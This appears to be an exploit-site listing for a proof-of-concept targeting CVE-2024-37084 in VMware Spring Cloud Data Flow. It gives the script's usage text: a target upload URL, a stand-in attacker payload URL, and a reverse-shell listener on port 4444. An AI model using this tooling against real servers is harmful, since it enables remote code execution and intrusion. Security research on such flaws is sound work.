Exploit for Code Injection in Vmware Spring Cloud Data Flow
Discription

CVE-2024-37084-Poc Setup ,Analysis , Demo exploit and poc about CVE-2024-37084 How to use : “` py .CVE-2024-37084-Poc.py -h usage: python poc_cve_2024_37084.py –target_url –version –origin –payload_url [–listen_ip ] [–listen_port ] PoC for CVE-2024-37084 – Remote Code Execution optional arguments: -h, –help show this help message and exit –target_url TARGET_URL URL of the target server (e.g., https://target_ip:port/api/package/upload) –version VERSION Version of the package (e.g., 4.0.0) –origin ORIGIN Origin name for the package (e.g., thePoc) –payload_url PAYLOAD_URL URL to the malicious payload (e.g., https://ip_attacker:port/something) –listen_ip LISTEN_IP IP to listen for the reverse shell (default: 0.0.0.0) –listen_port LISTEN_PORT Port to listen for the reverse shell (default: 4444) “` Link setup , analysis and Demo by me Link For yaml payload can use :…Read More

Back to Main

Subscribe for the latest news: